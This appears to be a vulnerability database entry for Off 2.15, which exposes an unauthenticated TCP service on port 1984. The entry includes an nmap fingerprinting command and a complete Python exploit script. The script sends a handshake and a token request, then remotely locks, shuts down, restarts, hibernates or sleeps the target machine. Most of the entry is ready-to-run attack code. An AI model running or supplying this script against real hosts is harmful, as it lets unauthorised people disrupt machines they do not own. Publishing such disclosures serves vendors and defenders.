📄 Off 2.15 Unauthenticated Remote System Control

🗓️ 25 Jun 2025 00:00:00Reported by Chokri HammediType

Off 2.15 exposes unauthenticated TCP service on port 1984 enabling remote control commands.

# Exploit Title: Off 2.15 - Unauthenticated Remote System Control
    # Date: 25/06/25
    # Exploit Author: Chokri Hammedi
    # Vendor Homepage: https://www.bridgetech.io
    # Software Link: https://www.bridgetech.io/OffLinux.zip
    # Version: 2.15
    # Tested on: Linux 6.1.15
    
    '''
    Description:
    
    Off 2.15 exposes a TCP service on 1984 port that allows unauthenticated
    attackers to issue remote system control commands such as Shutdown,
    Restart, Lock, Sleep, and Hibernate.
    
    Identification:
    
    nmap -sV --version-intensity 0 -T5 -p1984 192.168.8.107
    
    output:
    PORT      STATE SERVICE VERSION
    1984/tcp open  unknown
    1 service unrecognized despite returning data. If you know the
    service/version, please submit the following fingerprint at
    https://nmap.org/cgi-bin/submit.cgi?new-service :
    SF-Port49746-TCP:V=7.94SVN%I=0%D=6/25%Time=685B86E0%P=x86_64-pc-linux-gnu%
    SF:r(NULL,9,"unlocked\n");
    
    should return "unlocked".
    
    
    '''
    
    #!/usr/bin/env python3
    
    import socket
    import argparse
    import sys
    import json
    from time import sleep
    
    def control_pc(ip, port, action):
        try:
            with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
                s.connect((ip, port))
    
    
                s.sendall(b"Hello\x0a")
                response = s.recv(1024)
                print(f"[+] Server response: {response.decode().strip()}")
    
    
                s.sendall(b'{"messageType":"AccessTokenRequest"}\x0a')
    
                sleep(1)
    
                s.sendall((action + "\x0a").encode())
                print(f"[+] Sent command: {action}")
    
        except Exception as e:
            print(f"[!] Error: {e}")
    
    if __name__ == "__main__":
        parser = argparse.ArgumentParser()
        parser.add_argument("--lock", action="store_true")
        parser.add_argument("--shutdown", action="store_true")
        parser.add_argument("--restart", action="store_true")
        parser.add_argument("--hibernate", action="store_true")
        parser.add_argument("--sleep", action="store_true")
        parser.add_argument("--ip", default="127.0.0.1")
        parser.add_argument("--port", type=int, default=1984)
    
        args = parser.parse_args()
    
        actions = {
            "Lock": args.lock,
            "Shutdown": args.shutdown,
            "Restart": args.restart,
            "Hibernate": args.hibernate,
            "Sleep": args.sleep
        }
    
        selected = [a for a, v in actions.items() if v]
    
        if len(selected) != 1:
            print("Specify one action")
            sys.exit(1)
    
        control_pc(args.ip, args.port, selected[0])

25 Jun 2025 00:00Current

7.8High risk

Vulners AI Score7.8